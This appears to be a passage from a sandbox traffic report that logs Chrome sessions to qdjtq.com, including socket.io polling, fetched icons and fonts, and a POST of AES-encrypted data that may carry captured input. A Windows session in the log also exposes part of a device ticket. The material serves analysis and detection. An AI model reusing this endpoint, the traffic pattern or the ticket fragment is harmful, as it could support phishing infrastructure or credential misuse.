            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC166INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            96192.168.2.649821129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:53 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8muanR&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:53 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            97192.168.2.649820129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:53 UTC360OUTGET /modify/layout/images/56.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC314INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: image/svg+xml
            Content-Length: 4900
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"1324-1902494f420"
            2024-09-27 00:29:53 UTC4900INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 31 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 14</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            98192.168.2.649822129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:53 UTC360OUTGET /modify/layout/images/57.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: image/svg+xml
            Content-Length: 10409
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"28a9-1902494f420"
            2024-09-27 00:29:53 UTC10409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 30</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            99192.168.2.649823129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:53 UTC664OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mubD8&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 631
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC631OUTData Raw: 34 32 32 5b 22 6d 65 73 73 61 67 65 22 2c 7b 22 6d 73 67 22 3a 7b 22 74 79 70 65 22 3a 22 55 32 46 73 64 47 56 6b 58 31 39 74 75 6a 63 65 4f 47 74 64 6b 70 58 2b 76 45 35 45 34 6a 59 6e 75 6e 61 57 22 2c 22 64 61 74 61 22 3a 22 55 32 46 73 64 47 56 6b 58 31 2b 48 53 59 32 78 56 36 6e 34 41 61 30 65 74 75 31 51 4e 73 69 32 72 35 36 50 73 4b 78 36 6b 62 50 4c 67 6f 71 77 4b 61 32 4c 65 49 4c 76 69 4e 63 62 49 44 6c 79 39 4a 46 63 73 68 6c 6b 4c 47 49 4e 6f 69 76 4a 30 6b 2b 48 31 50 38 69 61 4f 68 6a 57 77 33 38 4f 32 55 47 4c 35 34 78 7a 56 73 53 72 6e 53 65 78 39 69 34 68 7a 56 55 73 52 67 72 47 6b 42 76 38 4a 63 4d 35 66 65 71 74 50 72 54 51 66 69 56 6a 74 76 39 34 67 72 7a 66 30 33 41 6f 51 69 6a 6b 78 72 41 36 2f 71 47 43 35 48 68 2b 2f 54 56 46 39 4b
            Data Ascii: 422["message",{"msg":{"type":"U2FsdGVkX19tujceOGtdkpX+vE5E4jYnunaW","data":"U2FsdGVkX1+HSY2xV6n4Aa0etu1QNsi2r56PsKx6kbPLgoqwKa2LeILviNcbIDly9JFcshlkLGINoivJ0k+H1P8iaOhjWw38O2UGL54xzVsSrnSex9i4hzVUsRgrGkBv8JcM5feqtPrTQfiVjtv94grzf03AoQijkxrA6/qGC5Hh+/TVF9K
            2024-09-27 00:29:53 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:53 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            100192.168.2.649824129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:53 UTC597OUTGET /modify/layout/images/60.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:54 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: image/svg+xml
            Content-Length: 2828
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"b0c-1902494f420"
            2024-09-27 00:29:54 UTC2828INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 32 39 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 29</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            101192.168.2.649825129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:53 UTC589OUTGET /modify/assets/84221e6ctE5dP.woff2 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: font
            Referer: https://qdjtq.com/modify/assets/297557e4tE5dP.css
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:54 UTC312INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:54 GMT
            Content-Type: font/woff2
            Content-Length: 27824
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:28 GMT
            ETag: W/"6cb0-19024951360"
            2024-09-27 00:29:54 UTC16072INData Raw: 77 4f 46 32 00 01 00 00 00 00 6c b0 00 14 00 00 00 00 d7 1c 00 00 6c 3f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 1f 1b df 1a 1c 81 6c 3f 48 56 41 52 84 49 06 60 3f 53 54 41 54 81 38 27 2e 00 85 56 2f 7e 11 08 0a f3 24 df 63 0b 83 70 00 30 81 a9 0a 01 36 02 24 03 87 5c 04 20 05 89 60 07 86 51 0c 07 1b 0a ca 25 8a 5e 77 e2 dc 36 80 b8 e5 e4 b1 ea 08 05 1c 87 77 b7 14 a0 15 17 f3 84 1b 43 0f 1b 87 01 d3 fc 08 e5 ff cf 49 b6 c6 c0 c7 6e ff 00 aa da aa 0d 84 1c 11 60 04 04 4f 0a 15 7d 54 a1 e6 5c b5 eb 70 d0 38 b1 c7 a8 30 63 e2 3e d1 ef 44 74 ec f9 6b 16 17 68 45 1b 58 8f 75 10 64 a3 a8 b2 9a 6c d7 c5 be d0 41 f0 5d 90 1b b1 75 e3 a6 61 ea eb bd d8 4a a5 8c d3 7a 17 5c 1e 84 90 d4 93 de 22 6d 05 04 f1 e0 19 58 36 62 52 32
            Data Ascii: wOF2ll?l?HVARI`?STAT8'.V/~$cp06$\ `Q%^w6wCIn`O}T\p80c>DtkhEXudlA]uaJz\"mX6bR2
            2024-09-27 00:29:54 UTC11752INData Raw: f2 a0 89 cc b7 aa ed 1a e8 f5 1d e5 82 1f 3b 14 79 f4 9e 82 f1 01 3e 45 19 99 f6 2c 63 f7 73 3d 79 fa 8b 44 1b 65 f4 07 03 07 58 98 91 2a d2 7e 2b 44 92 0d e8 b9 ee 30 85 34 6e 08 0d 25 ca aa 61 90 67 f7 98 77 18 e1 64 aa c2 25 5e 69 57 c1 b7 93 5e 9e d8 e4 50 7b 6e c3 34 19 3c 89 43 9e 98 b4 f5 3b 4b e2 8b 96 37 c7 f3 68 09 f2 bb 79 f5 c2 f3 5e c1 42 47 bc dc 46 13 b8 1f 1f bf f1 bc a5 25 e1 93 13 2d fe aa 2c d3 68 36 9f 0d 4c 56 f3 1c cc b4 fb f4 2e 2b 45 59 3d 7f ff 55 3f e8 2c dd a8 e8 e4 68 10 22 a3 99 de 1a 0a e5 66 7b fb 4e cd 99 db e1 bd 7f fc 7b 99 72 49 e8 fe 24 30 49 25 c2 48 91 85 7a c5 fc 10 4c b8 99 b8 20 92 64 73 2c 27 4b 19 5e d2 93 e4 95 78 d4 1c 07 c4 c8 12 85 af c0 2d c5 cf 1a bf 08 ca 6b 16 3a dd cc cf 4f 56 dc d9 dc 9b cc 30 8d 11 4e
            Data Ascii: ;y>E,cs=yDeX*~+D04n%agwd%^iW^P{n4<C;K7hy^BGF%-,h6LV.+EY=U?,h"f{N{rI$0I%HzL ds,'K^x-k:OV0N


            Session IDSource IPSource PortDestination IPDestination Port
            102192.168.2.64982640.115.3.253443
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 53 41 31 4a 52 30 45 76 5a 45 79 66 72 43 42 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 33 38 35 62 38 31 31 31 38 39 32 34 31 33 61 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: SA1JR0EvZEyfrCBi.1Context: f385b8111892413a
            2024-09-27 00:29:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-27 00:29:53 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 53 41 31 4a 52 30 45 76 5a 45 79 66 72 43 42 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 33 38 35 62 38 31 31 31 38 39 32 34 31 33 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 2f 46 6d 55 48 49 65 72 35 62 48 42 54 6b 4f 58 4f 45 4f 38 6a 6b 45 63 78 71 77 4f 52 74 6c 2f 6d 6b 59 47 62 66 76 67 6a 42 51 4c 43 52 56 4b 72 41 54 54 4b 2b 76 36 78 71 50 45 32 38 67 47 75 63 36 62 63 58 79 6f 66 77 37 2b 6a 54 64 6f 7a 57 6c 4b 32 5a 54 75 74 64 70 5a 42 38 4b 56 6f 79 64 30 61 75 6a 56 78 50 4e 66
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: SA1JR0EvZEyfrCBi.2Context: f385b8111892413a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe/FmUHIer5bHBTkOXOEO8jkEcxqwORtl/mkYGbfvgjBQLCRVKrATTK+v6xqPE28gGuc6bcXyofw7+jTdozWlK2ZTutdpZB8KVoyd0aujVxPNf
            2024-09-27 00:29:53 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 53 41 31 4a 52 30 45 76 5a 45 79 66 72 43 42 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 33 38 35 62 38 31 31 31 38 39 32 34 31 33 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: SA1JR0EvZEyfrCBi.3Context: f385b8111892413a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-27 00:29:54 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-27 00:29:54 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 6b 6f 77 4e 6f 33 6b 35 55 43 39 68 68 2b 37 56 47 5a 62 77 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: 8kowNo3k5UC9hh+7VGZbwg.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            103192.168.2.649827129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:54 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8muayj&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:54 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:54 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:54 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            104192.168.2.649828129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:54 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8muayi&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:54 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:54 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:54 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            105192.168.2.649829129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:54 UTC360OUTGET /modify/layout/images/59.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:54 UTC314INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:54 GMT
            Content-Type: image/svg+xml
            Content-Length: 7554
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"1d82-1902494f420"
            2024-09-27 00:29:54 UTC7554INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 32 38 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 28</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            106192.168.2.649830129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:54 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mub9p&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:55 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:54 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:55 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


